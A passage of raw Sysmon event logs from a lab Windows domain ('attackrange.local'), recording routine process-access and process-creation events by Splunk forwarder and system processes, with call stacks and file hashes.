08:08:24.452{0C1E0330-F878-60EB-E379-00000000D001}34282696C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810459Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:24.280{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F878-60EB-E379-00000000D001}3428C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810458Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:24.280{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810457Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:24.280{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810456Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:24.280{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810455Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:24.280{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810454Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:24.280{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810453Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:24.280{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810452Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:24.280{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810451Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:24.280{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810450Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:24.280{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810449Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:24.280{0C1E0330-048F-60E8-0500-00000000D001}412428C:\Windows\system32\csrss.exe{0C1E0330-F878-60EB-E379-00000000D001}3428C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000810448Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:24.280{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F878-60EB-E379-00000000D001}3428C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000810447Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:24.266{0C1E0330-F878-60EB-E379-00000000D001}3428C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000810446Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:23.999{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2D316EABFF5B5832EE96004CC06FF8BE,SHA256=679210BC4F51DF71E560E5B09C79A173F0E462F3AFFF3D88463C3AD3C8F0AA03,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054929Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:25.140{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0BF29C4807C06A2F5251364FDA2A8F41,SHA256=79DBB81040A59D23D3B18EA95CB0CC3913F530BEB2B3B43D1775A521632BB68E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000810490Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:25.796{0C1E0330-F879-60EB-E579-00000000D001}33483920C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810489Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:25.655{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F879-60EB-E579-00000000D001}3348C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810488Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:25.655{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810487Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:25.655{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810486Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:25.655{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810485Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:25.655{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810484Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:25.655{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810483Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:25.655{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810482Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:25.655{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810481Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:25.655{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810480Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:25.655{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810479Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:25.655{0C1E0330-048F-60E8-0500-00000000D001}412528C:\Windows\system32\csrss.exe{0C1E0330-F879-60EB-E579-00000000D001}3348C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000810478Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:25.655{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F879-60EB-E579-00000000D001}3348C:\Program 